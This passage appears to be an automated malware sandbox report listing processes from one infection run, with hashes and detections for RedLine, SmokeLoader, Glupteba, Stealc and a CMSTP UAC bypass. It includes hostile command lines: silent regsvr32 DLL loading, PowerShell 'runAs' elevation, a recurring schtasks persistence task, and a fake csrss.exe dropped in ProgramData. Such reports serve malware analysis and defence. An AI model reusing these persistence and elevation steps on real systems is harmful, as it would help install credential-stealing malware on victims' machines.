00000006.00000002.2457015789.000000000087D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	00:22:26
Start date:	21/02/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 /s C:\Users\user\AppData\Local\Temp\7DFF.dll
Imagebase:	0x7ff6b8000000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	8
Start time:	00:22:26
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	/s C:\Users\user\AppData\Local\Temp\7DFF.dll
Imagebase:	0x3c0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	9
Start time:	00:22:27
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\81F7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\81F7.exe
Imagebase:	0x400000
File size:	1'947'648 bytes
MD5 hash:	91DAF47EC23BDC6E075F0B4D81F9D6C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2371366172.000000000228E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	10
Start time:	00:22:27
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\81F7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\81F7.exe
Imagebase:	0x400000
File size:	1'947'648 bytes
MD5 hash:	91DAF47EC23BDC6E075F0B4D81F9D6C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	11
Start time:	00:22:30
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\8BAD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8BAD.exe
Imagebase:	0xd50000
File size:	7'798'568 bytes
MD5 hash:	ABA267CEA6CFB575DF0F5EAE54E22459
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	12
Start time:	00:22:33
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\98EC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\98EC.exe
Imagebase:	0x960000
File size:	6'602'840 bytes
MD5 hash:	BB91BC28144EE278CBEB31B29F91A0CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2713325811.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2716357785.0000000001834000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2722531717.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2715049663.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	13
Start time:	00:22:34
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\9E0E.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9E0E.exe
Imagebase:	0x400000
File size:	431'104 bytes
MD5 hash:	1996A23C7C764A77CCACF5808FEC23B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2478981380.0000000000413000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 91%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	15
Start time:	00:22:35
Start date:	21/02/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
Imagebase:	0x730000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	19
Start time:	00:22:37
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\9E0E.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\9E0E.exe"
Imagebase:	0x400000
File size:	431'104 bytes
MD5 hash:	1996A23C7C764A77CCACF5808FEC23B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2510134874.0000000000413000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Target ID:	20
Start time:	00:22:39
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\AF26.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AF26.exe
Imagebase:	0xc20000
File size:	9'104'384 bytes
MD5 hash:	CEAE65EE17FF158877706EDFE2171501
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\AF26.exe, Author: ditekSHen
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	21
Start time:	00:22:41
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Imagebase:	0x400000
File size:	4'315'536 bytes
MD5 hash:	D122F827C4FC73F9A06D7F6F2D08CD95
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.2688178585.0000000002A6F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000015.00000003.2546245866.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000015.00000002.2690691611.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000015.00000002.2682406576.0000000000843000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000015.00000002.2690691611.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	true

Target ID:	22
Start time:	00:22:42
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
Imagebase:	0x400000
File size:	2'123'218 bytes
MD5 hash:	28B72E7425D6D224C060D3CF439C668C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 63%, ReversingLabs
Has exited:	true

Target ID:	23
Start time:	00:22:42
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\FourthX.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\FourthX.exe"
Imagebase:	0x7ff703f90000
File size:	2'654'720 bytes
MD5 hash:	B03886CB64C04B828B6EC1B2487DF4A4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	true

Target ID:	24
Start time:	00:22:43
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Imagebase:	0x400000
File size:	4'979'200 bytes
MD5 hash:	5E94F0F6265F9E8B2F706F1D46BBD39E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000018.00000000.2521373252.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Has exited:	false

Target ID:	25
Start time:	00:22:43
Start date:	21/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	00:22:43
Start date:	21/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	00:22:44
Start date:	21/02/2024
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	1'947'648 bytes
MD5 hash:	91DAF47EC23BDC6E075F0B4D81F9D6C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.2613214560.0000000002600000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Has exited:	true

Target ID:	28
Start time:	00:22:44
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\C53F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C53F.exe
Imagebase:	0x400000
File size:	142'848 bytes
MD5 hash:	4EFCEC7DF29A58ED31415372388D2824
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.2615942734.0000000002371000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001C.00000002.2615942734.0000000002371000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.2615767161.0000000000AAB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000003.2552513633.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.2615561764.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001C.00000002.2615561764.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001C.00000002.2615526346.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	29
Start time:	00:22:45
Start date:	21/02/2024
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	1'947'648 bytes
MD5 hash:	91DAF47EC23BDC6E075F0B4D81F9D6C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	30
Start time:	00:22:47
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\D0F8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D0F8.exe
Imagebase:	0x400000
File size:	4'754'167 bytes
MD5 hash:	D3F837209D88F951D58F89320E087A95
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	true

Target ID:	31
Start time:	00:22:50
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp" /SL5="$10476,4502673,54272,C:\Users\user\AppData\Local\Temp\D0F8.exe"
Imagebase:	0x400000
File size:	705'536 bytes
MD5 hash:	3ED810E886CB43A350DBCCD3A2939423
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	32
Start time:	00:22:50
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
Imagebase:	0x400000
File size:	186'368 bytes
MD5 hash:	27284482B63B322A0877B1E4F51702FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.2982480618.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.2981951494.00000000008AB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.2981994536.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	33
Start time:	00:22:51
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	34
Start time:	00:22:51
Start date:	21/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	36
Start time:	00:22:51
Start date:	21/02/2024
Path:	C:\Windows\System32\consent.exe
Wow64 process (32bit):	false
Commandline:	consent.exe 6016 414 0000022C4F022750
Imagebase:	0x7ff7d8700000
File size:	186'704 bytes
MD5 hash:	DD5032EF160209E470E2612A8A3D5F59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	37
Start time:	00:22:51
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\E4FE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E4FE.exe
Imagebase:	0x400000
File size:	4'754'167 bytes
MD5 hash:	D3F837209D88F951D58F89320E087A95
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	false

Target ID:	38
Start time:	00:22:51
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 1251
Imagebase:	0x150000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	39
Start time:	00:22:52
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp" /SL5="$204C4,4502673,54272,C:\Users\user\AppData\Local\Temp\E4FE.exe"
Imagebase:	0x400000
File size:	705'536 bytes
MD5 hash:	3ED810E886CB43A350DBCCD3A2939423
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	40
Start time:	00:22:52
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\D0F8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\D0F8.exe" /SPAWNWND=$1048C /NOTIFYWND=$10476
Imagebase:	0x400000
File size:	4'754'167 bytes
MD5 hash:	D3F837209D88F951D58F89320E087A95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	41
Start time:	00:22:52
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
Imagebase:	0x380000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	43
Start time:	00:22:53
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp" /SL5="$104D4,4502673,54272,C:\Users\user\AppData\Local\Temp\D0F8.exe" /SPAWNWND=$1048C /NOTIFYWND=$10476
Imagebase:	0x400000
File size:	705'536 bytes
MD5 hash:	3ED810E886CB43A350DBCCD3A2939423
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true